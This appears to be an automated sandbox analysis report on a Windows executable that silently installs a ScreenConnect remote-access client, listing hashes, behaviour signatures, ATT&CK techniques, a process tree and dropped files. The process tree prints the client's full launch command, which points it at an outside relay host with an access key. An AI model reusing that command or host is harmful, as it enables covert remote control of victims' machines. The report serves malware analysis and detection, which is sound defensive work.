Analysis
-
max time kernel
94s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
22-11-2024 22:38
General
-
Target
1c7dfc929d8e92aee949babc920e7994de5ef98eb9977e668f51406abed2de94N.exe
-
Size
5.2MB
-
MD5
dbd8e0fb9ecd8bb7d275c66d650066f0
-
SHA1
c75890c60f4faaba669260cbad018ed8b2381e31
-
SHA256
1c7dfc929d8e92aee949babc920e7994de5ef98eb9977e668f51406abed2de94
-
SHA512
148b5a41180c48f458beba22d0f20cf76136ab2ad0622a957ff2c771d8bbfe9190a2fd95f2d47f0e7e0d9ae9ba9eb73014d0e5545c5ef7545e7e1219424c93aa
-
SSDEEP
98304:yps6efPfBOPvLtabi4X0MV+dYdcGt7VIb4:0fefPJws3V+a
Malware Config
Signatures
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops file in System32 directory 3 IoCs
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Drops file in Program Files directory 19 IoCs
-
Drops file in Windows directory 13 IoCs
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 20 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 13 IoCs
-
Modifies registry class 37 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 21 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1c7dfc929d8e92aee949babc920e7994de5ef98eb9977e668f51406abed2de94N.exe"C:\Users\Admin\AppData\Local\Temp\1c7dfc929d8e92aee949babc920e7994de5ef98eb9977e668f51406abed2de94N.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\6ee41f91e0356b36\setup.msi"2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C6901ADE64AD6F74D4B0DEF3BBBADA31 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI8405.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240616609 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 09BC42887BE19CAA49DC7780B4767A332⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 801578B906ADD6B06E279E5CC639EE64 E Global\MSI00002⤵
- Drops file in Windows directory
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fw396back6.site&p=8880&s=c972fd69-044f-44de-bd7a-ba30c3a4dd4d&k=BgIAAACkAABSU0ExAAgAAAEAAQAh9bOsei5K5vIJDnPhKls%2biGM39asuRHfnvVllACipdmLgWh32OGpscJN79La1W4aR8OMfoKYaOS3v5ZGE32ciouAfxFBwCbiQs0x7sHJp3sbNmvVKC7QPIpogrcDpbCEn%2f4VAMqbkbUoE%2bPnhjHFiuGHGL%2b%2fsr8ScxspCAy6iRK2rijP1eK%2bfZ%2f8OmtIxNHfw3iiTATFowZ8X%2bb9i%2fnTIOljL%2fqYjPRq4WRBkIWbBgo2NkKHdWcXSlw38SiA%2bZ5qO4Z2VvuJoTH5DS%2fgrJ3peABETazbJLEr8cKYx0emj39NjikGEbb%2fXjjiAr5k7ew%2bAGSVqKCPJnRwFcfUwwqml&t=Special&c=&c=Beanie&c=NewMoble&c=&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Drops file in System32 directory
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.WindowsClient.exe" "RunRole" "48332910-a2e4-495b-a48d-c100a4bd0661" "User"2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (6ee41f91e0356b36)\ScreenConnect.WindowsClient.exe" "RunRole" "1352fc84-44d4-4fa3-a6ed-144722a82be8" "System"2⤵
- Drops file in System32 directory
- Executes dropped EXE
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: AddClipboardFormatListener
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
213KB
MD59463ad78a64831e67e68504403cd5677
SHA1ed871e83609ce6ba9a55925a0150809837fb6cd9
SHA256bd7f9450e933e90f9a95a7bff2bc0031a7901ae519ac014a854ed258ccdc6598
SHA512264a5093e3063b47ab3272a4e0aea24d1c451547efc98d45525638b4087d48c61ba4f79e8efcb9aa051733ceb38d2564df1c8eebe4205e4fc6af3055b9c1391f
-
Filesize
762B
MD5b09dfe9fef5bdad50aed0c5c81a7f8b8
SHA10fe2acb83a8d66156e3f8afe10963c3878a9c8d4
SHA25639a6456f828160e9f1d49df496143a3d83401478b0b9dfd18b66d1f44628aa73
SHA512c5709d3cb1379acccff12a19ca42b3b696f2266aa94792b011acd7658eb319c8ef6df5019f83d8759f1e19db9d4492582794739c185bd691d7c84493f7390bfb
-
Filesize
17KB
MD51a9ce086dc257d884e31d884d8c138f1
SHA183de5729eb3e524986f18f5144490fd2de9a8377
SHA2568d0d89b5cbcbfc3c4eac7b05ec6a4eb018388e8022d033524b6317bb53c8d56f
SHA5128ca7783af9c4c143178587ac0b6928d6d7e37f8b4b2176a34bb4f76415f492286736b2ae8d8e555bb3cefc103fe816d98fa1296d6bf8ddc094f6ab0d6c85f2d1
-
Filesize
47KB
MD53e83a3aa62c5ff54ed98e27b3fbecf90
SHA196d8927c870a74a478864240b3ace94ad543dfb8
SHA2562d88b97d28be01abca4544c6381a4370c1a1ce05142c176742f13b44889ddf90
SHA512ea9d05a4aa1ee5cccc61c4f5e8994efba9efff0549b69577bef1f2a22cce908739124eff1e0db5cfdd69e077ad2d7cdb1307de92d79673c9309ee621cb139956
-
Filesize
26KB
MD55cd580b22da0c33ec6730b10a6c74932
SHA10b6bded7936178d80841b289769c6ff0c8eead2d
SHA256de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
SHA512c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787
-
Filesize
188KB
MD56bc9611d5b6cee698149a18d986547a8
SHA1f36ab74e4e502fdaf81e101836b94c91d80cb8ea
SHA25617377a52eeae11e8ee01eb629d6a60c10015ad2bb8bc9768e5c8e4b6500a15ed
SHA5123f23670d0ba150de19a805db6beb6eed8538bbad6fbe3cc21d17d738a43cf411c679a23cea11549e69be0321e672f740791d40e92498aef9d1f8650743ee85ea
-
Filesize
60KB
MD522af3a23bd30484514cdacf67c5b3810
SHA1e92a4eaee9d896964de541ce2f01c2404b638258
SHA2567c5442121dba2a30ab9579ec08e111ded372cf9cf90fb3256f273980b975afa9
SHA51295e40b27e90fce7ca85e76afbbc16eb62b4bb977664702b987de2eb2294e6fe9e6df5610ec7b2362c2c68493313f30fbbcbd3446dbe8ae2fa47b89407f5d5936
-
Filesize
93KB
MD5dc615e9d8ec81cbf2e2452516373e5a0
SHA1ec83d37a4f45caeb07b1605324d0315f959452e9
SHA256e9ab064ed381c29a3930f75ca3e05605c6ee07f30a69c043f576a5461de3bafc
SHA51282fe00447fb9785264dfb8032399adf6d33d91d71058212d252742c9e5fd54f5a52f6baf4fb05e95f9a4055057c60a33a7c1c642f18a6a4e045b49be88fa5d9f
-
Filesize
1.6MB
MD529454a0cb83f28c24805e9a70e53444a
SHA1334202965b07ab69f08b16fed0ee6c7274463556
SHA256998cc3f9af5bd41ccf0f9be86192bbe20cdec08a6ff73c1199e1364195a83e14
SHA51262790920974a2f1b018d466ae3e3b5100006a3c8013f43bdb04af7074cfe5d992caaeb610de2b1b72ff0e4acf8762db1513a4a0cf331f9a340ae0ce53c3be895
-
Filesize
573KB
MD55dec65c4047de914c78816b8663e3602
SHA18807695ee8345e37efec43cbc0874277ed9b0a66
SHA25671602f6b0b27c8b7d8ad624248e6126970939effde785ec913ace19052e9960e
SHA51227b5dcb5b0aeadf246b91a173d06e5e8d6cf2cd19d86ca358e0a85b84cd9d8f2b26372ef34c3d427f57803d90f2e97cf59692c80c268a71865f08fc0e7ce42d1
-
Filesize
266B
MD5728175e20ffbceb46760bb5e1112f38b
SHA12421add1f3c9c5ed9c80b339881d08ab10b340e3
SHA25687c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
SHA512fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7
-
Filesize
746KB
MD5f01a59c5cf7ec437097d414d7c6d59c4
SHA19ea1c3fbf3b5adbe5a23578dea3b511d44e6a2dd
SHA25662b405f32a43da0c8e8ed14a58ec7b9b4422b154bfd4aed4f9be5de0bc6eb5e8
SHA512587748ad4dd18677a3b7943eab1c0f8e77fe50a45e17266ba9a0e1363eda0ff1eabcf11884a5d608e23baf86af8f011db745ad06bcdecdfd01c20430745fe4bb
-
Filesize
3KB
MD5c1b856b986497097b9c303b83bffbcb7
SHA1619ee7b90bbf8629f627461016c0183252bfe849
SHA256660a168c69aaf009973494325d72d1b3ae19b1ba80490528b6aac232a693dac5
SHA51246d5b11da4f5c1485194f585dcb76a6c29b9459baaae506f1869530084d59dc0c6bdff8af80ae78d81c5b01e3f043b5694782ff6b37cd0fccc80980f906622e3
-
Filesize
949B
MD5bf1bec6547f8cfbafb716f05782a5791
SHA1ec08d67c4e5a765e259254ef4ae80dc75f7eafbc
SHA256e3728185c9c1d00ef9391bad4a977c142edd97d41c9745e1d4519a4b433cdf94
SHA51265e5802599db1a8e784aafb853cd95e9e3def66fa9d91b0c8d6d8599d2a5e5d876b9d50b3a3fd2f6f849e13b6c124f38c3511c97d2e276d8c3b05b28f6c559c9
-
Filesize
1017KB
MD58d94c9f4c07b76b4e32daffcc51109da
SHA162e31a89c488d6745abb72a3071f688fd6180d33
SHA2562b35c0e4088b2a7728fa7bc6a5bfdefed7665598de6d49641fdf5d1f1271a4d7
SHA5120092cbbd95777e6931864d61931efdf3a349f79c575030cad9a1771432f52e1bdc25d5640e2923d202c42c2ce242d00187486334a946e97319d48211233eb0ac
-
Filesize
172KB
MD55ef88919012e4a3d8a1e2955dc8c8d81
SHA1c0cfb830b8f1d990e3836e0bcc786e7972c9ed62
SHA2563e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d
SHA5124544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684
-
Filesize
519KB
MD5b319407e807be1a49e366f7f8ea7ee2a
SHA1b12197a877fb7e33b1cb5ba11b0da5ca706581ba
SHA256761b7e50baa229e8afcd9a50990d7f776ddb5ed1ea5fbb131c802e57cf918742
SHA512dc497643790dc608dece9c8fe7264efedd13724bd24c9bf28a60d848b405fddefb8337a60f3f32bb91518910e02c7a2aaf29fc32f86a464dfcafa365526bdb7f
-
Filesize
21KB
MD5b0585159161d50e330b7f8eda50a2770
SHA18636fab3ce6c21a42d3e5fbd495c2ddad4279162
SHA256ca9e51d51f24e16428d1b0e9a0829a44da2678bfc7ba00f0b46a57dcd6d734b8
SHA512e9ae99bdce64ca4282fa4580d3b081f7d0874c756aef77fb58e10db148e2f670ba48667ce62033c6f514ff825dc54c1bdbae2c7f8d5f9355486402cf75e1d5ad
-
Filesize
13.5MB
MD53240b7e3cbb4e8fe5bc174d9d1ad5d12
SHA1c063e09e6bf4b8e43d7ed7f0b110234d7c6abc46
SHA256bcd06b1e0bd0ac449ba96cdd23e249372035b6707a4c5c8343525ac1256c00f8
SHA51200f319511194f0fbeb0fa6c48de6a5f734b7847af03d389b4fdd57374dc8d56f6f01838e17c7dc3fd7c780a2896861525e13e0b0eb0cc96b5d1be07f7bc965fd
-
Filesize
202KB
MD5ba84dd4e0c1408828ccc1de09f585eda
SHA1e8e10065d479f8f591b9885ea8487bc673301298
SHA2563cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
SHA5127a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290
-
Filesize
24.1MB
MD5ff3d359426f6b5519f94b2f175e1298f
SHA1e59fe7a92ef7d066ae0f8323cf05aeaa011a5cda
SHA256daa30e3500ee8eb5030e4cff862750e21e4ae2de0346b53f38a96763d14104cf
SHA5129f5650b9566626ddbd3564bb8a14960b4c5c3cf6990cbadc085179e097b1b2642222ab0dfe470fd1ecad35444890bb50ae59b4d7caa356dfd40aa5f98b5ff3d1
-
Filesize
6KB
MD5ed0b1cfbe7689d446bfecfafe27823c4
SHA1979298466930dfcc599823b4ff9a7b41ac970d9b
SHA256f890c56e2bc96b1929a62c560a8f97e46b4f5284988e7c57f9dbff1a24aaf20e
SHA512794198678d87b0297ff28d15493729214756d73e2bc035212c8ad862af79aff694baccdedbe7d7e45e714c18dd499afd874232c5ca6754ca73757fe03108150f
-
Filesize
592KB
-
Filesize
216KB
-
Filesize
1.7MB
-
Filesize
544KB
-
Filesize
1.5MB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
7.7MB
-
Filesize
32KB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
544KB
-
Filesize
7.7MB
-
Filesize
2.8MB
-
Filesize
5.6MB
-
Filesize
1.7MB
-
Filesize
760KB
-
Filesize
88KB
-
Filesize
320KB
-
Filesize
584KB
-
Filesize
216KB
-
Filesize
544KB
-
Filesize
48KB
-
Filesize
184KB